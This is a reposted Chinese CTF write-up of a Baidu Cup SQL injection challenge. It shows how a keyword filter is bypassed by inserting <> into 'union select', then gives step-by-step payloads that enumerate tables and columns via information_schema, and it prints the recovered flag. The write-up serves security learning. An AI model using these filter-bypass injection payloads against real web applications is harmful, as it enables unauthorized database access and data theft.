sql注入用<>绕过被过滤的select ——百度杯9月第二场SQL

本文转载自查看原文 2019-09-17 16:47 650 ctf write up

题目提示SQL注入，打开源代码发现

尝试union select 1,2,3提示inj code!

经过多次尝试之后发现select已经被过滤，于是百度绕过select过滤的方法，/*!%53eLEct*/，发现依旧无法绕过select过滤

经过再次尝试后发现可以用<>进行绕过，于是构造payload un<>ion sel<>ect 1,2,3

返回了一个2，说明第二个字段可以显示

构建payload查询表名 un<>ion sel<>ect 1,group_concat(table_name) ,3from information_shema.tables where table_schema=database()

发现有info表

构建payload查询字段 un<>ion sel<>ect 1,group_concat(column_name) ,3 from information_schema.columns where table_name=0x696e666f(info的16进制)

发现有3个字段id,title,flAg_T5ZNdrm

构建payload获取字段 un<>ion sel<>ect 1,group_concat(flAg_T5ZNdrm),3 from info

获得flag

flag{f24a0c69-ee21-47c8-b54d-60f7728c5e6e}

本站转载的文章为个人学习借鉴使用，本站对版权不负任何法律责任。如果侵犯了您的隐私权益，请联系本站邮箱yoyou2525@163.com删除。

猜您在找 百度杯11月第二场web专场 ctf web 百度杯”CTF比赛九月场Upload i春秋百度杯”CTF比赛九月场SQLi ---------i春秋 “百度杯”CTF比赛十月场_GetFlag(验证码爆破+注入+绝对路径文件下载) sql注入绕过union select过滤 i春秋——“百度杯”CTF比赛九月场——Test（海洋cms / seacms 任意代码执行漏洞） “百度杯”CTF比赛十二月场_blog（kindeditor编辑器遍历，insert注入，文件包含） 2020年第十一届蓝桥杯省赛第二场（10月17日）B组个人题解 i春秋——“百度杯”CTF比赛九月场——123（Apache解析pht,phtml,php3,phps等 php别名） i春秋——“百度杯”CTF比赛十月场——Not Found（http请求方法，client-ip伪造ip）